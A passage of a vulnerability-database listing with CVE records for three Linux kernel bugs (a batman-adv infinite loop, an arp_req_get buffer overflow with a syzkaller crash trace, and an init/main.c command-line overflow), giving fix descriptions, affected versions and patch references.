"dateUpdated": "2024-06-04T17:33:51.361Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.996Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/04720ea2e6c64459a90ca28570ea78335eccd924"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b3ddf6904073990492454b1dd1c10a24be8c74c6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/70a8be9dc2fb65d67f8c1e0c88c587e08e2e575d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/87b6af1a7683e021710c08fc0551fc078346032f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3fe79b2c83461edbbf86ed8a6f3924820ff89259"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4ca2a5fb54ea2cc43edea614207fcede562d91c2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ca54e2671548616ad34885f90d4f26f7adb088f0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b1f532a3b1e6d2e5559c7ace49322922637a28aa"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/batman-adv/translation-table.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "04720ea2e6c64459a90ca28570ea78335eccd924",
"status": "affected",
"version": "a19d3d85e1b854e4a483a55d740a42458085560d",
"versionType": "git"
},
{
"lessThan": "b3ddf6904073990492454b1dd1c10a24be8c74c6",
"status": "affected",
"version": "a19d3d85e1b854e4a483a55d740a42458085560d",
"versionType": "git"
},
{
"lessThan": "70a8be9dc2fb65d67f8c1e0c88c587e08e2e575d",
"status": "affected",
"version": "a19d3d85e1b854e4a483a55d740a42458085560d",
"versionType": "git"
},
{
"lessThan": "87b6af1a7683e021710c08fc0551fc078346032f",
"status": "affected",
"version": "a19d3d85e1b854e4a483a55d740a42458085560d",
"versionType": "git"
},
{
"lessThan": "3fe79b2c83461edbbf86ed8a6f3924820ff89259",
"status": "affected",
"version": "a19d3d85e1b854e4a483a55d740a42458085560d",
"versionType": "git"
},
{
"lessThan": "4ca2a5fb54ea2cc43edea614207fcede562d91c2",
"status": "affected",
"version": "a19d3d85e1b854e4a483a55d740a42458085560d",
"versionType": "git"
},
{
"lessThan": "ca54e2671548616ad34885f90d4f26f7adb088f0",
"status": "affected",
"version": "a19d3d85e1b854e4a483a55d740a42458085560d",
"versionType": "git"
},
{
"lessThan": "b1f532a3b1e6d2e5559c7ace49322922637a28aa",
"status": "affected",
"version": "a19d3d85e1b854e4a483a55d740a42458085560d",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/batman-adv/translation-table.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.13"
},
{
"lessThan": "3.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.156",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.87",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.28",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.156",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.87",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.28",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.7",
"versionStartIncluding": "3.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbatman-adv: Avoid infinite loop trying to resize local TT\n\nIf the MTU of one of an attached interface becomes too small to transmit\nthe local translation table then it must be resized to fit inside all\nfragments (when enabled) or a single packet.\n\nBut if the MTU becomes too low to transmit even the header + the VLAN\nspecific part then the resizing of the local TT will never succeed. This\ncan for example happen when the usable space is 110 bytes and 11 VLANs are\non top of batman-adv. In this case, at least 116 byte would be needed.\nThere will just be an endless spam of\n\n batman_adv: batadv0: Forced to purge local tt entries to fit new maximum fragment MTU (110)\n\nin the log but the function will never finish. Problem here is that the\ntimeout will be halved all the time and will then stagnate at 0 and\ntherefore never be able to reduce the table even more.\n\nThere are other scenarios possible with a similar result. The number of\nBATADV_TT_CLIENT_NOPURGE entries in the local TT can for example be too\nhigh to fit inside a packet. Such a scenario can therefore happen also with\nonly a single VLAN + 7 non-purgable addresses - requiring at least 120\nbytes.\n\nWhile this should be handled proactively when:\n\n* interface with too low MTU is added\n* VLAN is added\n* non-purgeable local mac is added\n* MTU of an attached interface is reduced\n* fragmentation setting gets disabled (which most likely requires dropping\n attached interfaces)\n\nnot all of these scenarios can be prevented because batman-adv is only\nconsuming events without the the possibility to prevent these actions\n(non-purgable MAC address added, MTU of an attached interface is reduced).\nIt is therefore necessary to also make sure that the code is able to handle\nalso the situations when there were already incompatible system\nconfiguration are present."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:09:48.633Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/04720ea2e6c64459a90ca28570ea78335eccd924"
},
{
"url": "https://git.kernel.org/stable/c/b3ddf6904073990492454b1dd1c10a24be8c74c6"
},
{
"url": "https://git.kernel.org/stable/c/70a8be9dc2fb65d67f8c1e0c88c587e08e2e575d"
},
{
"url": "https://git.kernel.org/stable/c/87b6af1a7683e021710c08fc0551fc078346032f"
},
{
"url": "https://git.kernel.org/stable/c/3fe79b2c83461edbbf86ed8a6f3924820ff89259"
},
{
"url": "https://git.kernel.org/stable/c/4ca2a5fb54ea2cc43edea614207fcede562d91c2"
},
{
"url": "https://git.kernel.org/stable/c/ca54e2671548616ad34885f90d4f26f7adb088f0"
},
{
"url": "https://git.kernel.org/stable/c/b1f532a3b1e6d2e5559c7ace49322922637a28aa"
}
],
"title": "batman-adv: Avoid infinite loop trying to resize local TT",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35982",
"datePublished": "2024-05-20T09:42:06.397Z",
"dateReserved": "2024-05-17T13:50:33.144Z",
"dateUpdated": "2025-05-04T09:09:48.633Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26733 (GCVE-0-2024-26733)
Vulnerability from cvelistv5
Published
2024-04-03 17:00
Modified
2025-05-04 08:55
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
arp: Prevent overflow in arp_req_get().
syzkaller reported an overflown write in arp_req_get(). [0]
When ioctl(SIOCGARP) is issued, arp_req_get() looks up an neighbour
entry and copies neigh->ha to struct arpreq.arp_ha.sa_data.
The arp_ha here is struct sockaddr, not struct sockaddr_storage, so
the sa_data buffer is just 14 bytes.
In the splat below, 2 bytes are overflown to the next int field,
arp_flags. We initialise the field just after the memcpy(), so it's
not a problem.
However, when dev->addr_len is greater than 22 (e.g. MAX_ADDR_LEN),
arp_netmask is overwritten, which could be set as htonl(0xFFFFFFFFUL)
in arp_ioctl() before calling arp_req_get().
To avoid the overflow, let's limit the max length of memcpy().
Note that commit b5f0de6df6dc ("net: dev: Convert sa_data to flexible
array in struct sockaddr") just silenced syzkaller.
[0]:
memcpy: detected field-spanning write (size 16) of single field "r->arp_ha.sa_data" at net/ipv4/arp.c:1128 (size 14)
WARNING: CPU: 0 PID: 144638 at net/ipv4/arp.c:1128 arp_req_get+0x411/0x4a0 net/ipv4/arp.c:1128
Modules linked in:
CPU: 0 PID: 144638 Comm: syz-executor.4 Not tainted 6.1.74 #31
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-5 04/01/2014
RIP: 0010:arp_req_get+0x411/0x4a0 net/ipv4/arp.c:1128
Code: fd ff ff e8 41 42 de fb b9 0e 00 00 00 4c 89 fe 48 c7 c2 20 6d ab 87 48 c7 c7 80 6d ab 87 c6 05 25 af 72 04 01 e8 5f 8d ad fb <0f> 0b e9 6c fd ff ff e8 13 42 de fb be 03 00 00 00 4c 89 e7 e8 a6
RSP: 0018:ffffc900050b7998 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff88803a815000 RCX: 0000000000000000
RDX: 0000000000000000 RSI: ffffffff8641a44a RDI: 0000000000000001
RBP: ffffc900050b7a98 R08: 0000000000000001 R09: 0000000000000000
R10: 0000000000000000 R11: 203a7970636d656d R12: ffff888039c54000
R13: 1ffff92000a16f37 R14: ffff88803a815084 R15: 0000000000000010
FS: 00007f172bf306c0(0000) GS:ffff88805aa00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f172b3569f0 CR3: 0000000057f12005 CR4: 0000000000770ef0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
PKRU: 55555554
Call Trace:
<TASK>
arp_ioctl+0x33f/0x4b0 net/ipv4/arp.c:1261
inet_ioctl+0x314/0x3a0 net/ipv4/af_inet.c:981
sock_do_ioctl+0xdf/0x260 net/socket.c:1204
sock_ioctl+0x3ef/0x650 net/socket.c:1321
vfs_ioctl fs/ioctl.c:51 [inline]
__do_sys_ioctl fs/ioctl.c:870 [inline]
__se_sys_ioctl fs/ioctl.c:856 [inline]
__x64_sys_ioctl+0x18e/0x220 fs/ioctl.c:856
do_syscall_x64 arch/x86/entry/common.c:51 [inline]
do_syscall_64+0x37/0x90 arch/x86/entry/common.c:81
entry_SYSCALL_64_after_hwframe+0x64/0xce
RIP: 0033:0x7f172b262b8d
Code: 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f172bf300b8 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
RAX: ffffffffffffffda RBX: 00007f172b3abf80 RCX: 00007f172b262b8d
RDX: 0000000020000000 RSI: 0000000000008954 RDI: 0000000000000003
RBP: 00007f172b2d3493 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
R13: 000000000000000b R14: 00007f172b3abf80 R15: 00007f172bf10000
</TASK>
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-11-01T17:03:11.240Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dbc9b22d0ed319b4e29034ce0a3fe32a3ee2c587"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/97eaa2955db4120ce6ec2ef123e860bc32232c50"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f119f2325ba70cbfdec701000dcad4d88805d5b0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a3f2c083cb575d80a7627baf3339e78fedccbb91"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3ab0d6f8289ba8402ca95a9fc61a34909d5e1f3a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a7d6027790acea24446ddd6632d394096c0f4667"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20241101-0013/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26733",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:52:00.464269Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:20.304Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv4/arp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "dbc9b22d0ed319b4e29034ce0a3fe32a3ee2c587",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "97eaa2955db4120ce6ec2ef123e860bc32232c50",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f119f2325ba70cbfdec701000dcad4d88805d5b0",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a3f2c083cb575d80a7627baf3339e78fedccbb91",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "3ab0d6f8289ba8402ca95a9fc61a34909d5e1f3a",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a7d6027790acea24446ddd6632d394096c0f4667",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv4/arp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\narp: Prevent overflow in arp_req_get().\n\nsyzkaller reported an overflown write in arp_req_get(). [0]\n\nWhen ioctl(SIOCGARP) is issued, arp_req_get() looks up an neighbour\nentry and copies neigh-\u003eha to struct arpreq.arp_ha.sa_data.\n\nThe arp_ha here is struct sockaddr, not struct sockaddr_storage, so\nthe sa_data buffer is just 14 bytes.\n\nIn the splat below, 2 bytes are overflown to the next int field,\narp_flags. We initialise the field just after the memcpy(), so it\u0027s\nnot a problem.\n\nHowever, when dev-\u003eaddr_len is greater than 22 (e.g. MAX_ADDR_LEN),\narp_netmask is overwritten, which could be set as htonl(0xFFFFFFFFUL)\nin arp_ioctl() before calling arp_req_get().\n\nTo avoid the overflow, let\u0027s limit the max length of memcpy().\n\nNote that commit b5f0de6df6dc (\"net: dev: Convert sa_data to flexible\narray in struct sockaddr\") just silenced syzkaller.\n\n[0]:\nmemcpy: detected field-spanning write (size 16) of single field \"r-\u003earp_ha.sa_data\" at net/ipv4/arp.c:1128 (size 14)\nWARNING: CPU: 0 PID: 144638 at net/ipv4/arp.c:1128 arp_req_get+0x411/0x4a0 net/ipv4/arp.c:1128\nModules linked in:\nCPU: 0 PID: 144638 Comm: syz-executor.4 Not tainted 6.1.74 #31\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-5 04/01/2014\nRIP: 0010:arp_req_get+0x411/0x4a0 net/ipv4/arp.c:1128\nCode: fd ff ff e8 41 42 de fb b9 0e 00 00 00 4c 89 fe 48 c7 c2 20 6d ab 87 48 c7 c7 80 6d ab 87 c6 05 25 af 72 04 01 e8 5f 8d ad fb \u003c0f\u003e 0b e9 6c fd ff ff e8 13 42 de fb be 03 00 00 00 4c 89 e7 e8 a6\nRSP: 0018:ffffc900050b7998 EFLAGS: 00010286\nRAX: 0000000000000000 RBX: ffff88803a815000 RCX: 0000000000000000\nRDX: 0000000000000000 RSI: ffffffff8641a44a RDI: 0000000000000001\nRBP: ffffc900050b7a98 R08: 0000000000000001 R09: 0000000000000000\nR10: 0000000000000000 R11: 203a7970636d656d R12: ffff888039c54000\nR13: 1ffff92000a16f37 R14: ffff88803a815084 R15: 0000000000000010\nFS: 00007f172bf306c0(0000) GS:ffff88805aa00000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f172b3569f0 CR3: 0000000057f12005 CR4: 0000000000770ef0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nPKRU: 55555554\nCall Trace:\n \u003cTASK\u003e\n arp_ioctl+0x33f/0x4b0 net/ipv4/arp.c:1261\n inet_ioctl+0x314/0x3a0 net/ipv4/af_inet.c:981\n sock_do_ioctl+0xdf/0x260 net/socket.c:1204\n sock_ioctl+0x3ef/0x650 net/socket.c:1321\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:870 [inline]\n __se_sys_ioctl fs/ioctl.c:856 [inline]\n __x64_sys_ioctl+0x18e/0x220 fs/ioctl.c:856\n do_syscall_x64 arch/x86/entry/common.c:51 [inline]\n do_syscall_64+0x37/0x90 arch/x86/entry/common.c:81\n entry_SYSCALL_64_after_hwframe+0x64/0xce\nRIP: 0033:0x7f172b262b8d\nCode: 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007f172bf300b8 EFLAGS: 00000246 ORIG_RAX: 0000000000000010\nRAX: ffffffffffffffda RBX: 00007f172b3abf80 RCX: 00007f172b262b8d\nRDX: 0000000020000000 RSI: 0000000000008954 RDI: 0000000000000003\nRBP: 00007f172b2d3493 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000\nR13: 000000000000000b R14: 00007f172b3abf80 R15: 00007f172bf10000\n \u003c/TASK\u003e"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:55:10.662Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/dbc9b22d0ed319b4e29034ce0a3fe32a3ee2c587"
},
{
"url": "https://git.kernel.org/stable/c/97eaa2955db4120ce6ec2ef123e860bc32232c50"
},
{
"url": "https://git.kernel.org/stable/c/f119f2325ba70cbfdec701000dcad4d88805d5b0"
},
{
"url": "https://git.kernel.org/stable/c/a3f2c083cb575d80a7627baf3339e78fedccbb91"
},
{
"url": "https://git.kernel.org/stable/c/3ab0d6f8289ba8402ca95a9fc61a34909d5e1f3a"
},
{
"url": "https://git.kernel.org/stable/c/a7d6027790acea24446ddd6632d394096c0f4667"
}
],
"title": "arp: Prevent overflow in arp_req_get().",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26733",
"datePublished": "2024-04-03T17:00:20.437Z",
"dateReserved": "2024-02-19T14:20:24.165Z",
"dateUpdated": "2025-05-04T08:55:10.662Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26988 (GCVE-0-2024-26988)
Vulnerability from cvelistv5
Published
2024-05-01 05:27
Modified
2025-11-04 17:15
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
init/main.c: Fix potential static_command_line memory overflow
We allocate memory of size 'xlen + strlen(boot_command_line) + 1' for
static_command_line, but the strings copied into static_command_line are
extra_command_line and command_line, rather than extra_command_line and
boot_command_line.
When strlen(command_line) > strlen(boot_command_line), static_command_line
will overflow.
This patch just recovers strlen(command_line) which was miss-consolidated
with strlen(boot_command_line) in the commit f5c7310ac73e ("init/main: add
checks for the return value of memblock_alloc*()")
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: f5c7310ac73ea270e3a1acdb73d1b4817f11fd67 Version: f5c7310ac73ea270e3a1acdb73d1b4817f11fd67 Version: f5c7310ac73ea270e3a1acdb73d1b4817f11fd67 Version: f5c7310ac73ea270e3a1acdb73d1b4817f11fd67 Version: f5c7310ac73ea270e3a1acdb73d1b4817f11fd67 Version: f5c7310ac73ea270e3a1acdb73d1b4817f11fd67 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:15:27.644Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2ef607ea103616aec0289f1b65d103d499fa903a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0dc727a4e05400205358a22c3d01ccad2c8e1fe4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/76c2f4d426a5358fced5d5990744d46f10a4ccea"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/81cf85ae4f2dd5fa3e43021782aa72c4c85558e8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/936a02b5a9630c5beb0353c3085cc49d86c57034"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/46dad3c1e57897ab9228332f03e1c14798d2d3b9"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26988",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:44:56.344439Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:40.421Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"init/main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "2ef607ea103616aec0289f1b65d103d499fa903a",
"status": "affected",
"version": "f5c7310ac73ea270e3a1acdb73d1b4817f11fd67",
"versionType": "git"
},
{
"lessThan": "0dc727a4e05400205358a22c3d01ccad2c8e1fe4",
"status": "affected",
"version": "f5c7310ac73ea270e3a1acdb73d1b4817f11fd67",
"versionType": "git"
},
{
"lessThan": "76c2f4d426a5358fced5d5990744d46f10a4ccea",
"status": "affected",
"version": "f5c7310ac73ea270e3a1acdb73d1b4817f11fd67",
"versionType": "git"
},
{
"lessThan": "81cf85ae4f2dd5fa3e43021782aa72c4c85558e8",
"status": "affected",
"version": "f5c7310ac73ea270e3a1acdb73d1b4817f11fd67",
"versionType": "git"
},
{
"lessThan": "936a02b5a9630c5beb0353c3085cc49d86c57034",
"status": "affected",
"version": "f5c7310ac73ea270e3a1acdb73d1b4817f11fd67",
"versionType": "git"
},
{
"lessThan": "46dad3c1e57897ab9228332f03e1c14798d2d3b9",
"status": "affected",
"version": "f5c7310ac73ea270e3a1acdb73d1b4817f11fd67",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"init/main.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
